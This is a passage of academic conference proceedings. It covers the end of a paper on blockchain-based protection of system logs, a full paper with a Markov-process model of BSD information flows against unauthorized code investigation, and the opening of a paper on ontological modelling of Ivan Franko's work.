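```python
import hashlib
import syslog

def emit_block_signature(block_text: str) -> None:
    """Write the hash of a log block back into the system log itself,
    so the signature travels with the records it protects."""
    digest = hashlib.sha256(block_text.encode("utf-8")).hexdigest()
    syslog.openlog(ident="log-guardian", facility=syslog.LOG_AUTH)
    syslog.syslog(syslog.LOG_INFO, f"GUARDIAN-HASH: {digest}")
    syslog.closelog()
```

Because the signature enters the log through the normal collection path, the same code works whether the messages ultimately land in a plain text file or in the systemd-journald store.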
6 Conclusions

It has been established that an acceptable solution for protecting logs is the use of linked lists based on a blockchain. The scientific novelty of this study lies in the authors' proposed solution to a cybersecurity problem, the protection of system logs: the authors propose for the first time to apply blockchain technology to protect system logs. This decision is motivated by several factors: the emergence of a new generation of malware (Kobalos) and the low level of protection of logs from unauthorized access in modern mid-level systems. It is proven that the use of blockchain technology, even in low-level applications and on hardware with relatively modest technical characteristics, can ensure the integrity and security of data in distributed systems. The practical value of the proposed method of protecting system logs is that
the implementation of the proposed system requires no additional costs in the form of an infrastructure for backing up logs on a separate server, and no changes to the existing formats for collecting information. In addition, such a system can be deployed on-site by an ordinary system administrator, which further simplifies and reduces the cost of its use in the field.
References

1. Holt, T.J., Leukfeldt, R., Van De Weijer, S.: An examination of motivation and routine activity theory to account for cyberattacks against Dutch web sites. Crim. Justice Behav. 47(4), 487–505 (2020)
2. Ozer, M., Varlioglu, S., Gonen, B., Adewopo, V., Elsayed, N., Zengin, S.: Cloud incident response: challenges and opportunities. In: 2020 International Conference on Computational Science and Computational Intelligence (CSCI), pp. 49–54. IEEE (2020)
3. Blunden, B.: The Rootkit Arsenal: Escape and Evasion in the Dark Corners of the System. Jones & Bartlett Publishers, p. 783 (2012)
4. Harley, D., Lee, A.: The root of all evil? - Rootkits revealed, pp. 1–17 (2007)
5. Chen, X., Andersen, J., Mao, Z.M., Bailey, M., Nazario, J.: Towards an understanding of anti-virtualization and anti-debugging behavior in modern malware. In: 2008 IEEE International Conference on Dependable Systems and Networks with FTCS and DCC (DSN), pp. 177–186. IEEE (2008)
6. Aslan, Ö.A., Samet, R.A.: Comprehensive review on malware detection approaches. IEEE Access 8, 6249–6271 (2020)
7. Sancho, J.C., Caro, A., Ávila, M., Bravo, A.: New approach for threat classification and security risk estimations based on security event management. Futur. Gener. Comput. Syst. 113, 488–505 (2020)
8. Christodorescu, M., Jha, S.: Testing malware detectors. ACM SIGSOFT Softw. Eng. Notes 29(4), 34–44 (2004)
9. Wong, W., Stamp, M.: Hunting for metamorphic engines. J. Comput. Virol. 2(3), 211–229 (2006)
10. Jacob, G., Debar, H., Filiol, E.: Behavioral detection of malware: from a survey towards an established taxonomy. J. Comput. Virol. 4(3), 251–266 (2008)
11. Yu, B., Fang, Y., Yang, Q., Tang, Y., Liu, L.: A survey of malware behavior description and analysis. Front. Inf. Technol. Electron. Eng. 19(5), 583–603 (2018)
12. Demertzis, K., Tsiknas, K., Takezis, D., Skianis, C., Iliadis, L.: Darknet traffic big-data analysis and network management to real-time automating the malicious intent detection process by a weight agnostic neural networks framework. Electronics 10(7), 781 (2021)
13. Hangxia, Z., Peng, Z., Yong, Y.: Web log system of automatic backup and remote analysis. In: 2010 International Conference on Computer Application and System Modeling (ICCASM), pp. 469–472. IEEE (2010)
14. Barford, P., Yegneswaran, V.: An inside look at botnets. In: Advances in Information Security, pp. 171–191. Springer, US (2007)
15. Cinque, M., Cotroneo, D., Pecchia, A.: Challenges and directions in security information and event management (SIEM). In: 2018 IEEE International Symposium on Software Reliability Engineering Workshops (ISSREW), pp. 95–99. IEEE (2018)
16. González-Granadillo, G., González-Zarzosa, S., Diaz, R.: Security information and event management (SIEM): analysis, trends, and usage in critical infrastructures. Sensors 21(14), 1–28 (2021)
17. Johnson, J.: Average number of days to resolve a cyber attack on companies in the United States as of August 2015, by attack type (2022). https://www.statista.com/statistics/193463/average-days-to-resolve-a-cyber-attack-in-us-companies-by-attack/
18. IBM: Cost of a Data Breach Report 2020 (2021). https://www.ibm.com/security/digital-assets/cost-data-breach-report/#/ru
19. Mandiant: Mandiant Security Effectiveness Report. FireEye, pp. 1–22 (2020). https://www.fireeye.com/current-threats/annual-threat-report/security-effectiveness-report.html
20. Bryant, B.D., Saiedian, H.: Improving SIEM alert metadata aggregation with a novel kill-chain based classification model. Comput. Secur. 94, 1–23 (2020)
21. Indicator Removal on Host: Clear Linux or Mac System Logs, Sub-technique T1070.002. Enterprise MITRE ATT&CK (2022). https://attack.mitre.org/techniques/T1070/002
22. Léveillé, M.-E., Sanmillan, I.: A Wild Kobalos Appears: Tricksy Linux malware goes after HPCs. ESET Research White Paper, pp. 1–31 (2021). https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf
Information Flows Formalization for BSD Family Operating Systems Security Against Unauthorized Investigation

Maksym Lutskyi1, Sergiy Gnatyuk1,2(B), Oleksii Verkhovets2, and Artem Polozhentsev1

1 National Aviation University, Kyiv, Ukraine
[email protected] 2 State Scientific and Research Institute of Cybersecurity Technologies and Information
Protection, Kyiv, Ukraine
Abstract. Today the number and complexity of cyberattacks on critical infrastructure are increasing, which has made the protection of systems critical to national security more pressing. Software, including operating systems, is considered a resource of the state's critical information infrastructure, which is usually built on secure operating systems (UNIX, the BSD family, Linux). However, every operating system and all user software have flaws and security issues at different levels. It is important to model the information flows in operating systems, as this makes it possible to identify threats to information security more effectively and to implement preventive measures and countermeasures. From this standpoint, an analysis of modern research on the security of operating systems and user software has been carried out, identifying several basic areas: the study of the impact of malware on operating systems and user software; vulnerability analysis; and threat and risk research. The analysis shows that open issues relate to the construction and information processes of particular operating systems, as well as to the lack of adequate mathematical models that can be applied to different security systems to obtain quantitative characteristics for comparing their parameters. In addition, structural and analytical models of the information flows of the BSD family of operating systems are developed, which makes it possible to formalize the information processes of the studied operating system and to develop effective preventive measures and countermeasures. Furthermore, the mathematical model for the quantitative evaluation of software information security systems operating in user mode has been improved. This model will be useful both for comparing existing software information security systems and for analyzing changes in their security algorithms.

Keywords: Software information security · operating system · information flow · unauthorized investigation · structural-analytical model · mathematical model · BSD
1 Introduction

Today the number and complexity of cyberattacks on critical infrastructure are increasing [1], which has made the protection of systems critical to national security more pressing. Software, including operating systems, is considered a resource of the state's critical information infrastructure, which is usually built on secure operating systems (UNIX, the BSD family, Linux). However, every OS and all user software have flaws and security issues at different levels. Modeling the information flows in the OS is therefore relevant: it makes it possible to identify threats to information security more effectively and to implement preventive measures and countermeasures. The analysis of studies on OS and user software protection has identified several basic areas [2–5]: the study of the impact of malware on the OS and user software (researchers include Tinka T., Smirnov O. [5], Shadhin V. and others); vulnerability analysis (Semenov S., McGraw G. and others); and threat and risk research (Kozyrakis K. [2], In-Sheng S. and others). The conducted analysis shows that open issues remain, related to the lack of adequate mathematical models that can be applied to different protection systems in order to obtain quantitative characteristics for comparing their parameters [6]. The existing models of software information security systems [7–9] were developed for particular protection systems, taking the specifics of their design into account, and are not suitable for evaluating an arbitrary information protection system or a specific OS [10]. It is also difficult to obtain and compare quantitative characteristics because the models depend on a number of factors that are hard to formalize (the qualification of the researcher, the scanning tools available to him). Therefore, the purpose of this study is to formalize the information flows in order to protect the BSD family more effectively against unauthorized investigation.
2 Research Methodology

To meet the purpose of the study, it is necessary to do the following:

• to develop a classification of information flows and, on its basis, a structural model of the software environment for protection against means of unauthorized investigation;
• to improve the mathematical model, based on the created classification and structural model, so that quantitative characteristics can be calculated for assessing the effectiveness of countermeasures to scanning tools.

2.1 Classification of the Information Flows

The BSD family consists of the following software components (Fig. 1):

• OS kernel loader;
• OS kernel;
• file system;
• main process init;
• shell;
• system and application software;
• files.
Fig. 1. Functional structure of the BSD system
It is necessary to define the concept of information flows in the environment of the OS protection software system. An information flow is a virtual channel of exchange between the blocks of a structural model if, and only if, data exchange between these blocks occurs in at least one direction. A specific characteristic of an information flow is that its use by scanning tools can be monitored. A protected information flow must be controlled by the information protection system of the OS by means of countermeasures to scanning tools [7–9]. Information flow control is an action on the part of a scanning tool that aims to gain access to the transmitted virtual data channels in order to view, modify or block them [10]. The control exercised by scanning tools is considered complete if it can access the original, intermediate and final transmitted data [11–13]. The following three categories of information flows can be distinguished at the time an application is running:

1. Information flows that exist within the loaded file image. A feature of this category is that such a flow does not use any auxiliary structures for data transmission whose access could easily be intercepted by scanning tools, which makes scanning very complicated. An example of this category is the data exchange between two data sections of the same loaded file image: such an exchange can clearly be carried out without calling OS functions that a potential attacker's scanning tool could control (in the structural models given below, this category of information flows is indicated by solid lines);
2. Information flows between the executable file and dynamically loaded libraries. This interaction is performed through the file's import and/or export tables or via the API functions dlopen, dlclose and dlsym. A feature of this category is the possibility of scanning by software code investigation tools: such investigation can be performed by modifying the import and/or export tables of the target dynamically loaded library, or by deploying a library that is a software bookmark (in the structural models given below, this category of information flows is indicated by dashed lines);
3. Information flows of interaction between user mode and kernel mode. Such a flow can be present either in the image of the executable file or in the images of dynamically loaded libraries. A feature of this category is that an attacker can scan it fully, while it is difficult for the software protection system to control the integrity of the transmitted information. This difficulty arises from the lack of direct access to kernel mode from a user-mode information protection software system, which makes it hard to detect a potential attacker's scanning tools located in kernel mode (in the structural models given below, this category of information flows is indicated by dashed lines).

The classification of information flows into these categories is justified as follows:

• it takes into account the deployment locations of software code investigation tools;
• it takes into account how difficult each category is to scan by software code investigation methods.

By improving the mathematical model for assessing the reliability of a software information protection system, which is based on Markov processes, the complexity of the investigation process can be expressed through the intensities of events [12–14]. The listed categories of information flows are present in the address space of any user application, which makes the developed classification applicable to any information protection system. The developed classification of information flows is used to build the structural models of the software environment from the standpoint of protection against scanning tools.

2.2 Structural and Analytical Models

The following designations are used in the structural model:

• user mode is marked as “Ring 3”;
• kernel mode is marked as “Ring 0”.

The structural model of the information flows of the user application software environment is shown in Fig. 2. The developed structural model takes into account the following characteristics of user applications:

1. The absence of direct access to the address space of the “Ring 0” of protection from the user application's code;
Fig. 2. Structural model of information flows of user application software environment
2. The concurrent operation of user applications, represented in the form of separate address spaces;
3. The impossibility of loading an executable file that runs without dynamically loaded libraries; therefore, the address space of any user application contains one or more libraries. In addition, calls to dynamic libraries may be nested: a library that was not loaded by the executing file itself may still be present in the address space of the application.

“Ring 0” can be accessed from the address space of a user application only through the system call interface. The separation of application address spaces is achieved by overwriting the value in the control register holding the page table base address, CR3. An address space is automatically created for every new process (processes 1…N are marked on the structural model). The OS uses dynamically loaded libraries to make efficient use of RAM: these libraries are loaded only into the address spaces of the applications that need them (their connection through the import and export tables is shown with dashed lines). The above-mentioned features of user applications affect the development of software protection systems that effectively counteract scanning tools.
The results of the analysis of software code investigation tools are shown in the structural model (Fig. 3), which demonstrates the possible effects on the address space of an application by program code scanning tools. Gray color in Fig. 3 marks the software code investigation tools used to scan the software environment, and the gray arrows show the influence that a particular scanning tool can exert to gain unauthorized access. Gray arrows that point not at individual information flows but at the application's address space as a whole schematically indicate the ability to control the entire address space, and therefore all categories of information flows. Without software information protection systems, all categories of information flows can be controlled by scanning tools. Direct influence of active emulators and user-mode debuggers on the analyzed application is impossible; the only way to implement such interaction is through the special inter-process communication mechanisms supported by the operating system. Calling inter-process communication mechanisms from the scanning facilities leads to the invocation of kernel services through the system call interface. Therefore, if the scanning tools use inter-process communication mechanisms, they explicitly address the OS kernel mode (shown with arrows in the structural model), which affects the address space of the application through the “Ring 0” of protection.
Fig. 3. Structural model of information flows of user application software environment in the context of unauthorized investigation
Influence on the application through the “Ring 0” of protection can also be exerted by the filter drivers of monitoring software. Controlling the information flows of the software environment by means of unauthorized investigation is easier when there are centralized data structures used for control transfer operations. The existing countermeasures can counteract only some of the considered means of unauthorized investigation. The means of unauthorized investigation that can be effectively countered by the existing protection methods of a user-mode software information protection system are as follows:

• passive code emulators functioning in user mode;
• debuggers functioning in user mode;
• static scanning tools;
• memory dumping programs (memory dumping effectively counteracts the use of encryption and pseudo-code, but there are currently no ways to counteract the dumping process itself).
The countermeasures used in the software protection subsystem cannot counteract the following means of unauthorized investigation:

• software for monitoring the operation of the analyzed application;
• active code emulators functioning in user mode;
• emulators functioning in kernel mode.

It is almost impossible to successfully counteract the most powerful means of unauthorized investigation, those running in kernel mode; this is shown schematically in Fig. 3 by the gray arrows from kernel-mode scanning tools to the address space of the user application. The structural model thus supports the conclusion that new ways of counteracting the means of unauthorized investigation need to be developed.
3 Experimental Study and Results

A software information protection system is completely compromised if control over all categories of information flows is exercised. Such control becomes possible in the following cases:

1. The information flows are not protected.
2. The means of counteracting unauthorized investigation for the relevant category of information flows are successfully neutralized.

The following notation is introduced: the information flows of categories 1–3 are denoted by $F_1$–$F_3$, respectively. All considered categories of information flows are independent of each other.
During the analysis of an information protection system by means of software code investigation, the system can be in the following states, so the attack process can be described by these states:

1. The system $S_1$ is not compromised; the means of code investigation are successfully neutralized by the countermeasures implemented for information flows of categories $F_1$–$F_3$;
2. The system $S_2$ is not compromised; the countermeasures implemented for information flow $F_1$ are compromised (or were never protected); flows $F_2$ and $F_3$ successfully counter the means of investigation;
3. The system $S_3$ is not compromised; the countermeasures implemented for information flow $F_2$ are compromised (or were never protected); flows $F_1$ and $F_3$ successfully counter the means of investigation;
4. The system $S_4$ is not compromised; the countermeasures implemented for information flow $F_3$ are compromised (or were never protected); flows $F_1$ and $F_2$ successfully counter the means of investigation;
5. The system $S_5$ is not compromised; the countermeasures implemented for information flows $F_1$ and $F_2$ are compromised (or were never protected); flow $F_3$ successfully counters the means of investigation;
6. The system $S_6$ is not compromised; the countermeasures implemented for information flows $F_1$ and $F_3$ are compromised (or were never protected); flow $F_2$ successfully counters the means of investigation;
7. The system $S_7$ is not compromised; the countermeasures implemented for information flows $F_2$ and $F_3$ are compromised (or were never protected); flow $F_1$ successfully counters the means of investigation;
8. The state $S_8$ (the absorbing state): the software information protection system is compromised; information flows of categories $F_1$–$F_3$ are controlled by the investigation means (compromised or unprotected).

Therefore, a software information protection system can be in eight distinct states. The initial state may be any of the following:

1. The system $S_1$ is scan-protected for information flows of categories $F_1$–$F_3$;
2. The system $S_2$ is scan-protected for information flows of categories $F_2$, $F_3$;
3. The system $S_3$ is scan-protected for information flows of categories $F_1$, $F_3$;
4. The system $S_4$ is scan-protected for information flows of categories $F_1$, $F_2$;
5. The system $S_5$ is scan-protected for information flows of category $F_3$;
6. The system $S_6$ is scan-protected for information flows of category $F_2$;
7. The system $S_7$ is scan-protected for information flows of category $F_1$.
Therefore, the initial state of a given software information protection system is determined by which countermeasures have been implemented for the corresponding categories of information flows. To transfer the software information protection system to the states characterized by neutralization of the countermeasures for category $F_1$ flows (the transitions $S_1 \to S_2$, $S_3 \to S_5$, $S_4 \to S_6$, $S_7 \to S_8$), a Poisson
distribution of successful attempts to neutralize the countermeasures for $F_1$ should be applied. The intensity of this Poisson distribution is as follows:

$$\lambda_1(t) = \lambda_{12}(t) = \lambda_{35}(t) = \lambda_{46}(t) = \lambda_{78}(t). \tag{1}$$
To transfer the system to the states characterized by neutralization of the countermeasures for category $F_2$ flows (the transitions $S_1 \to S_3$, $S_2 \to S_5$, $S_4 \to S_7$, $S_6 \to S_8$), a Poisson distribution of successful attempts to neutralize the countermeasures for $F_2$ should be applied, with intensity

$$\lambda_2(t) = \lambda_{13}(t) = \lambda_{25}(t) = \lambda_{47}(t) = \lambda_{68}(t). \tag{2}$$
To transfer the system to the states characterized by neutralization of the countermeasures for category $F_3$ flows (the transitions $S_1 \to S_4$, $S_2 \to S_6$, $S_3 \to S_7$, $S_5 \to S_8$), a Poisson distribution of successful attempts to neutralize the countermeasures for $F_3$ should be applied, with intensity

$$\lambda_3(t) = \lambda_{14}(t) = \lambda_{26}(t) = \lambda_{37}(t) = \lambda_{58}(t). \tag{3}$$
Therefore, in the user-mode software information protection system represented by the graph $G$, there are event flows with three different intensities: $\lambda_1(t)$ is the intensity of the flow of successful attempts to neutralize the countermeasures protecting information flows of category $F_1$; $\lambda_2(t)$ is the corresponding intensity for category $F_2$; and $\lambda_3(t)$ is the corresponding intensity for category $F_3$. The graph $G$, taking these intensity labels into account, is shown in Fig. 4. To simplify the records in (1), (2) and (3), the following notation is used:

$$\lambda_i(t) = \lambda_i. \tag{4}$$
The process by which scanning tools acquire control over the software information protection system operating in user mode is represented by the graph shown in Fig. 4. As Fig. 4 shows, the breaching process of a user-mode software information protection system (represented by the graph $G$) can be described using the theory of Markov processes with discrete states and continuous time:

• the system contains a finite set of states;
• the conditional probabilities of the system in each state do not depend on the time or on the way the system reached this state;
• the event flows that move the system from state to state follow a Poisson distribution (ordinary, stationary, without aftereffect).
Fig. 4. User mode graph G
Since the system process (shown in Fig. 4) is Markovian, it can be represented using Kolmogorov equations. The system of Kolmogorov equations describing the graph $G$ takes the following form, the right-hand sides following from the transitions and the intensities (1)–(3):

$$
\begin{cases}
\dfrac{dp_1(t)}{dt} = -p_1(t)\,(\lambda_1(t) + \lambda_2(t) + \lambda_3(t)) \\
\dfrac{dp_2(t)}{dt} = p_1(t)\,\lambda_1(t) - p_2(t)\,(\lambda_2(t) + \lambda_3(t)) \\
\dfrac{dp_3(t)}{dt} = p_1(t)\,\lambda_2(t) - p_3(t)\,(\lambda_1(t) + \lambda_3(t)) \\
\dfrac{dp_4(t)}{dt} = p_1(t)\,\lambda_3(t) - p_4(t)\,(\lambda_1(t) + \lambda_2(t)) \\
\dfrac{dp_5(t)}{dt} = p_2(t)\,\lambda_2(t) + p_3(t)\,\lambda_1(t) - p_5(t)\,\lambda_3(t) \\
\dfrac{dp_6(t)}{dt} = p_2(t)\,\lambda_3(t) + p_4(t)\,\lambda_1(t) - p_6(t)\,\lambda_2(t) \\
\dfrac{dp_7(t)}{dt} = p_3(t)\,\lambda_3(t) + p_4(t)\,\lambda_2(t) - p_7(t)\,\lambda_1(t) \\
\dfrac{dp_8(t)}{dt} = p_5(t)\,\lambda_3(t) + p_6(t)\,\lambda_2(t) + p_7(t)\,\lambda_1(t)
\end{cases} \tag{5}
$$

The use of the normalizing condition makes it possible to reduce the number of equations in the system by one. The normalizing condition is as follows:

$$\sum_{i=1}^{8} p_i(t) = 1. \tag{6}$$
According to the normalizing condition, $p_1(t)$ can be represented as follows:

$$p_1(t) = 1 - p_2(t) - p_3(t) - p_4(t) - p_5(t) - p_6(t) - p_7(t) - p_8(t) = 1 - \sum_{i=2}^{8} p_i(t). \tag{7}$$
Applying the normalizing condition at any time $t$ yields expression (7). Substituting expression (7) into the system of Eqs. (5) gives the following system of Eqs. (8):

$$
\begin{cases}
\dfrac{dp_2(t)}{dt} = \Bigl(1 - \sum_{i=2}^{8} p_i(t)\Bigr)\lambda_1(t) - p_2(t)\,(\lambda_2(t) + \lambda_3(t)) \\
\dfrac{dp_3(t)}{dt} = \Bigl(1 - \sum_{i=2}^{8} p_i(t)\Bigr)\lambda_2(t) - p_3(t)\,(\lambda_1(t) + \lambda_3(t)) \\
\dfrac{dp_4(t)}{dt} = \Bigl(1 - \sum_{i=2}^{8} p_i(t)\Bigr)\lambda_3(t) - p_4(t)\,(\lambda_1(t) + \lambda_2(t)) \\
\dfrac{dp_5(t)}{dt} = p_2(t)\,\lambda_2(t) + p_3(t)\,\lambda_1(t) - p_5(t)\,\lambda_3(t) \\
\dfrac{dp_6(t)}{dt} = p_2(t)\,\lambda_3(t) + p_4(t)\,\lambda_1(t) - p_6(t)\,\lambda_2(t) \\
\dfrac{dp_7(t)}{dt} = p_3(t)\,\lambda_3(t) + p_4(t)\,\lambda_2(t) - p_7(t)\,\lambda_1(t) \\
\dfrac{dp_8(t)}{dt} = p_5(t)\,\lambda_3(t) + p_6(t)\,\lambda_2(t) + p_7(t)\,\lambda_1(t)
\end{cases} \tag{8}
$$
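For illustration, system (5) together with the normalizing condition (6) can be integrated numerically to obtain the probability of full compromise $p_8(t)$ at any point in time. The sketch below uses SciPy; the constant intensity values are arbitrary assumptions chosen only to demonstrate the computation.

```python
from scipy.integrate import solve_ivp

# Assumed constant intensities (per unit time); illustrative values only.
l1, l2, l3 = 0.05, 0.03, 0.01

def kolmogorov(t, p):
    """Right-hand side of system (5) for states S1..S8."""
    p1, p2, p3, p4, p5, p6, p7, p8 = p
    return [
        -p1 * (l1 + l2 + l3),
        p1 * l1 - p2 * (l2 + l3),
        p1 * l2 - p3 * (l1 + l3),
        p1 * l3 - p4 * (l1 + l2),
        p2 * l2 + p3 * l1 - p5 * l3,
        p2 * l3 + p4 * l1 - p6 * l2,
        p3 * l3 + p4 * l2 - p7 * l1,
        p5 * l3 + p6 * l2 + p7 * l1,
    ]

# Initial state S1: all three flow categories are protected.
p0 = [1, 0, 0, 0, 0, 0, 0, 0]
sol = solve_ivp(kolmogorov, (0, 100), p0, dense_output=True)

t = 50.0
p = sol.sol(t)
print(f"p8({t}) = {p[7]:.4f}")                 # probability of full compromise
print(f"sum of probabilities: {p.sum():.6f}")  # normalizing condition (6)
```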
4 Discussion

Consequently, the obtained system of equations makes it possible to determine the probability of compromising a software information protection system at an arbitrary point in time. The enhanced model provides a quantitative assessment of the considered software information protection systems operating in the user mode. The obtained ratings can be used both to compare existing software information protection systems and to analyze modifications of their protection algorithms. The quantitative assessment can be interpreted as the probability that the software information protection system is not compromised within a certain period [11, 15]. The improved mathematical model is consistent with the results of simulations and can be used for any information protection system designed to work in the user mode.
5 Conclusions

This study has analyzed the current research on OS and user software protection, which reveals several basic areas: the impact of malware on the OS and user software, vulnerability analysis, and threat and risk analysis. The conducted analysis shows that there are open problems associated with the specifics of the information processes of a particular OS, as well as a lack of adequate mathematical models that can be applied to different protection systems in order to obtain quantitative characteristics for their comparison. Also, the structural-analytical model of the information flows of the BSD OS family has been developed, which makes it possible to formalize the information processes of the OS under study and to develop effective preventive countermeasures. In addition, the mathematical model for the quantitative evaluation of software information security systems operating in the user mode has been improved. The quantitative assessment can be interpreted as the probability that the software information protection system is not compromised within a certain period. This model will be useful both to
compare existing software information protection systems and to analyze modifications of their protection algorithms. In future studies, the authors plan to carry out detailed experiments on both the proposed structural-analytical model of the information flows of the BSD OS family and the mathematical model for the quantitative evaluation of software information security systems operating in the user mode, using real datasets.
References

1. Gnatyuk, S.: Critical aviation information systems cybersecurity. In: Meeting Security Challenges Through Data Analytics and Decision Support. NATO Science for Peace and Security Series, D: Information and Communication Security, vol. 47, no. 3, pp. 308–316. IOS Press Ebooks (2016)
2. Delimitrou, C., Kozyrakis, C.: Security implications of data mining in cloud scheduling. IEEE Comput. Archit. Lett. 15(2), 109–112 (2016). https://doi.org/10.1109/LCA.2015.2461215
3. Kocher, P., Lee, R., McGraw, G., Raghunathan, A., Ravi, S.: Security as a new dimension in embedded system design. In: 41st Design Automation Conference, pp. 753–760 (2004)
4. Kaur, K., Garg, S., Kaddoum, G., Bou-Harb, E., Choo, K.R.: A big data-enabled consolidated framework for energy efficient software defined data centers in IoT setups. IEEE Trans. Ind. Inf. 16(4), 2687–2697 (2020). https://doi.org/10.1109/TII.2019.2939573
5. Alimseitova, Z., Adranova, A., Akhmetov, B., Lakhno, V., Zhilkishbayeva, G., Smirnov, O.: Models and algorithms for ensuring functional stability and cybersecurity of virtual cloud resources. J. Theor. Appl. Inf. Technol. 98(21), 3334–3346 (2020)
6. Gnatyuk, S., Berdibayev, R., Avkurova, Z., Verkhovets, O., Bauyrzhan, M.: Studies on cloud-based cyber incidents detection and identification in critical infrastructure. CEUR Workshop Proc. 2923, 68–80 (2021)
7. Solms, S., Futcher, L.: Adaption of a secure software development methodology for secure engineering design. IEEE Access 8, 125630–125637 (2020)
8. Núñez, J.C.S., Lindo, A.C., Rodríguez, P.G.: A preventive secure software development model for a software factory: a case study. IEEE Access 8, 77653–77665 (2020)
9. Moyo, S., Mnkandla, E.: A novel lightweight solo software development methodology with optimum security practices. IEEE Access 8, 33735–33747 (2020). https://doi.org/10.1109/ACCESS.2020.2971000
10. Khan, R., Khan, S., Khan, H., Ilyas, M.: Systematic mapping study on security approaches in secure software engineering. IEEE Access 9, 19139–19160 (2021). https://doi.org/10.1109/ACCESS.2021.3052311
11. McGraw, G.: Software security: building security in. In: 17th International Symposium on Software Reliability Engineering, pp. 6–6 (2006). https://doi.org/10.1109/ISSRE.2006.43
12. Ostroumov, I., Kuzmenko, N.: Configuration analysis of European navigational aids network. In: Integrated Communications Navigation and Surveillance Conference (ICNS), pp. 1–9 (2021). https://doi.org/10.1109/ICNS52807.2021.9441576
13. Kuzmin, V., Zaliskyi, M., Odarchenko, R., Petrova, Y.: New approach to switching points optimization for segmented regression during mathematical model building. CEUR Workshop Proc. 3077, 106–122 (2022)
14. Ostroumov, I., Kuzmenko, N.: Compatibility analysis of multi signal processing in APNT with current navigation infrastructure. Telecommun. Radio Eng. 77, 211–223 (2018)
15. Solomentsev, O., Zaliskyi, M., Shcherbyna, O., Kozhokhina, O.: Sequential procedure of changepoint analysis during operational data processing. In: Microwave Theory and Techniques in Wireless Communications, pp. 168–171 (2020). https://doi.org/10.1109/MTTW51045.2020
Information and Communication Technology in Scientific Research
Ontological Modeling in Humanities Viktoriia Atamanchuk1(B) and Petro Atamanchuk2 1 National Centre “Junior Academy of Sciences of Ukraine”, Kyiv, Ukraine
[email protected] 2 Ternopil Volodymyr Hnatiuk National Pedagogical University, Ternopil, Ukraine
Abstract. The article analyzes the possibilities of using transdisciplinary ontology to represent information about the work of Ivan Franko (based on the program of Ukrainian literature for 10–11 grades, standard level). The object of research is to study the characteristics of the transdisciplinarity phenomenon in scientific and educational dimensions. The subject of research is transdisciplinary ontology as a tool to solve scientific problems. The aim of the study is to create a transdisciplinary ontology based on the work of Ivan Franko in the program of Ukrainian literature for 10–11 grades (standard level). The scientific significance of the study comprises the multidimensionality and multilevel nature of transdisciplinary research, which is determined by the study of scientific problems through the analysis of diverse projections in different scientific fields, which forms a holistic transdisciplinary paradigm. The practical significance of the study is determined by the consideration of important features of transdisciplinary ontology and means of its expression on the material of a fragment of the curriculum in Ukrainian literature for 10–11 grades; by the implementation of visualization of the formed transdisciplinary ontology with the help of cognitive IT platform “POLYEDR” (KIT “POLYEDR”); by the opportunities to use different forms of transdisciplinary ontology visualization. Keywords: Ontological modeling · taxonomy · transdisciplinary ontology · transdisciplinarity · cognitive services
1 Introduction

Ontological modeling has become an essential management method in modern science and education, as it provides a wide range of possibilities for research and the further application of results. In the Humanities, ontological modeling is particularly effective, since it helps when handling vast amounts of information and creating the structural schemes and interactive models necessary for successful information processing. Ontological modeling provides productive and efficient digital instruments for fulfilling educational and scientific tasks, reflecting digital shifts that are simultaneously the result and the driver of knowledge base formation and that greatly transform the processes of knowledge representation and perception owing to their digital reflection.
Scientists consider ontologies one of the most widespread technologies for knowledge dissemination in different spheres, especially those connected to the educational process [1]. Ontologies have proved to be efficient for modeling goals, instructional processes and instructional material within a framework for the design of educational technologies [2]. Attention is paid to the automatic construction of educational ontologies by converting domain textbooks into ontologies [3]. Ontologies are considered an essential part of a digital environment [4] that is personalized and adaptive and uses an ontology to model a specific learning subject. E-learning based on dynamic ontologies [5] is used to generate personalized recommendations for learners. Researchers also examine the possibility of creating a smart learning recommender based on multiple intelligence and fuzzy ontology [6], and attention is paid to forming recommendations of online learning resources with a hybrid ontology-based approach [7]. Scientists propose novel approaches to using ontologies in learning and education [8–10], which make the educational process more flexible, coherent and comprehensive, and focus on using ontologies to improve the portability of models predicting students' performance [11]. Many studies are devoted to the analysis of existing ways of representing ontologies, their functions and their capabilities for application in the scientific, educational, business and other spheres, as well as to the invention of novel methods and modes of ontology representation in order to improve and expand the possibilities of ontology application. Among such studies one can distinguish a new generic approach to fuzzification which allows a semantic representation of crisp and fuzzy data in a domain ontology [12]; a novel approach that encompasses ontology-based data access and visual analytics, combining the advantages of the ontological paradigm with the flexibility and robustness of a visual analytics environment [13]; and a new ontology learning algorithm for ontology similarity measuring and ontology mapping by means of the singular value decomposition method and deterministic sampling iteration [14]. Contemporary studies prove the vast range of ontology applications from the point of view of scientific thinking. The technical and technological parameters of ontology design, depiction and presentation are very important, as they show different ways of functional improvement. Much attention is also focused on the different spheres of ontology application. Our aim is to examine the theoretical basis and to analyze the practical results of ontology usage in the Humanities. The goal of the study is to substantiate the necessity and effectiveness of ontological modeling in the Humanities.

Formulation of the Problem. Performing the research objectives requires precise structuring of information and establishing correlations and hierarchical coherence between the components of the structure under study. These scientific problems can be solved with the help of ontologies. According to the aim and the outlined problem of the study, its tasks are: to examine the theoretical peculiarities of ontology use; to define the research possibilities of ontological environments in the Humanities; to construct a transdisciplinary ontology based on the work of Ivan Franko; and to determine transdisciplinary ontologies' functional
capacities. The structure of the article comprises Introduction, Materials and Methods, Experiments, Results, Discussion, Conclusions and References.
2 Materials and Methods

There are different definitions of ontology. Stryzhak et al. [15] designate ontology as an object-oriented functional resource which is based on expert knowledge and qualitatively represents the subject area; this definition reflects the process of conceptualization. Oberle et al. [16] identify computational ontologies as a means to formally model the structure of a system, namely the relevant entities and relations that emerge from its observation; here the emphasis is on the structural correlations of the sphere being analyzed. So we can consider an ontology as a system of concepts of a definite knowledge branch. To form a system of concepts, we have to formalize the information being processed by means of taxonomization. A taxonomy, i.e., a set of classified notions and terms in hierarchical order, forms the basis for ontology formation. Nadutenko et al. [17] claim that an ontology-driven system architecture implements procedures of taxonomy-based management, which allows dynamic change of the set of available functions, interfaces, and so on. The construction of a taxonomy is aimed at reflecting the interconnections of its structural elements: the terms, ideas, processes, etc. specific to the determined subject area. Using a taxonomy, we structure the information as a text with a hierarchical representation of terms. The text thus processed can be further reflected as a graph whose vertices are the distinguished concepts, their meanings and contexts; respectively, the graph edges represent the correspondences between the ontology components placed in the vertices. As an ontology comprises such elements as concepts, attributes and relations, it is a universal tool for research. Ontological modeling directs us toward a transdisciplinary perception of scientific problems, as it helps to precisely identify the terminological structure of different branches of science and then trace their intercorrelations at the levels of ideas, processes, phenomena, etc. The concept of transdisciplinarity forms the 